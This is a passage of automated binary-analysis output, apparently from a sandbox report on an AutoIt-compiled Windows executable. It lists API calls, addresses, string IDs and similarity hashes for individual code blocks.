                                                                                                    • Instruction ID: 3b904104b1c0b3c30e8a03853b0776bcd1f6c531647747964baf6998b7880b1a
                                                                                                    • Opcode Fuzzy Hash: d117fa84931900d30f9762ec6df0da8ba1c6d611af661f280bb61145b3463842
                                                                                                    • Instruction Fuzzy Hash: 4DE01A71801208EFCF409FB09808B5DBBB6FB48311F148446E84AA3260CB789A01BF40
                                                                                                    APIs
                                                                                                    • GetDesktopWindow.USER32 ref: 00F9EAE2
                                                                                                    • GetDC.USER32(00000000), ref: 00F9EAEC
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F9EAF8
                                                                                                    • ReleaseDC.USER32(?), ref: 00F9EB19
                                                                                                    Similarity
                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2889604237-0
                                                                                                    • Opcode ID: 71260d6da77a6e143f58437a324b7bf4f10c759109afde5aee67db7c86ec70ba
                                                                                                    • Instruction ID: 902d095f4a5303ff9386d04e54690c6e814678fe4463db36be2fb77e4bf94e48
                                                                                                    • Opcode Fuzzy Hash: 71260d6da77a6e143f58437a324b7bf4f10c759109afde5aee67db7c86ec70ba
                                                                                                    • Instruction Fuzzy Hash: 2CE01A71801208EFCB409FB09808A5DBBB6EB48311B148046E949A3250CB389A01AF40
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F43914: _wcslen.LIBCMT ref: 00F43919
                                                                                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00FB5643
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: Connection_wcslen
                                                                                                    • String ID: *$LPT
                                                                                                    • API String ID: 1725874428-3443410124
                                                                                                    • Opcode ID: c8ccb877ddaa65c9babbcddefe5496058034a4588f7f712c7c98522501484ed7
                                                                                                    • Instruction ID: 64a3fa3513c349617b33b99fdcf520100afdff78ca17659769df081ad97a0288
                                                                                                    • Opcode Fuzzy Hash: c8ccb877ddaa65c9babbcddefe5496058034a4588f7f712c7c98522501484ed7
                                                                                                    • Instruction Fuzzy Hash: 98915D75A00604DFCB14DF55C884FA9BBB6AF44714F288099E8099F362CB39EE85DF90
                                                                                                    APIs
                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00F6E65D
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: ErrorHandling__start
                                                                                                    • String ID: pow
                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                    • Opcode ID: 972298803a89dbf046f12a83f4bdac4e3ddb036ab9d87766fe0a39319f8ef0a1
                                                                                                    • Instruction ID: 375d045b42ceae50ac2fb61ee1b4054731f65dbb164842b6e30e4b85c0bf7008
                                                                                                    • Opcode Fuzzy Hash: 972298803a89dbf046f12a83f4bdac4e3ddb036ab9d87766fe0a39319f8ef0a1
                                                                                                    • Instruction Fuzzy Hash: D051BF77E5410186CB117714CD4D37A3BA0AB507A0F70CD6AF099862A9EF768C9BBA43
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: #
                                                                                                    • API String ID: 0-1885708031
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00000000), ref: 00F5F7CD
                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00F5F7E6
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                    • String ID: @
                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00FBD89F
                                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00FBD8A9
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: CrackInternet_wcslen
                                                                                                    • String ID: |
                                                                                                    • API String ID: 596671847-2343686810
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00FD4DDF
                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FD4DF4
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID: '
                                                                                                    • API String ID: 3850602802-1997036262
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00FD3A3A
                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FD3A45
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID: Combobox
                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                    APIs
                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00FBD4EC
                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00FBD515
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: Internet$OpenOption
                                                                                                    • String ID: <local>
                                                                                                    • API String ID: 942729171-4266983199
                                                                                                    APIs
                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00FD3C69
                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00FD3C78
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                    • String ID: edit
                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                    • CharUpperBuffW.USER32(?,?,?), ref: 00FA73AF
                                                                                                    • _wcslen.LIBCMT ref: 00FA73BB
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                    • String ID: STOP
                                                                                                    • API String ID: 1256254125-2411985666
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                      • Part of subcall function 00FA4392: GetClassNameW.USER32(?,?,000000FF), ref: 00FA43B5
                                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00FA242E
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 624084870-1403004172
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                      • Part of subcall function 00FA4392: GetClassNameW.USER32(?,?,000000FF), ref: 00FA43B5
                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00FA2328
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 624084870-1403004172
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                      • Part of subcall function 00FA4392: GetClassNameW.USER32(?,?,000000FF), ref: 00FA43B5
                                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00FA23AA
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 624084870-1403004172
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                      • Part of subcall function 00FA4392: GetClassNameW.USER32(?,?,000000FF), ref: 00FA43B5
                                                                                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00FA24B5
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 624084870-1403004172
                                                                                                    APIs
                                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00FA1205
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                    • API String ID: 2030045667-4017498283
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F5FBC6: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00F610C1,?,?,?,00F4100A), ref: 00F5FBCB
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00F4100A), ref: 00F610C5
                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F4100A), ref: 00F610D4
                                                                                                    Strings
                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F610CF
                                                                                                    Similarity
                                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                    • API String ID: 55579361-631824599
                                                                                                    APIs
                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00FB371A
                                                                                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00FB372F
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: Temp$FileNamePath
                                                                                                    • String ID: aut
                                                                                                    • API String ID: 3285503233-3010740371
                                                                                                    APIs
                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FD2AE7
                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00FD2AFA
                                                                                                      • Part of subcall function 00FAEFBC: Sleep.KERNEL32 ref: 00FAF034
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                    • String ID: Shell_TrayWnd
                                                                                                    • API String ID: 529655941-2988720461
                                                                                                    APIs
                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FD2B27
                                                                                                    • PostMessageW.USER32(00000000), ref: 00FD2B2E
                                                                                                      • Part of subcall function 00FAEFBC: Sleep.KERNEL32 ref: 00FAF034
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                    • String ID: Shell_TrayWnd
                                                                                                    • API String ID: 529655941-2988720461
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00F7C1E4
                                                                                                    • GetLastError.KERNEL32 ref: 00F7C1F2
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F7C24D
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1717984340-0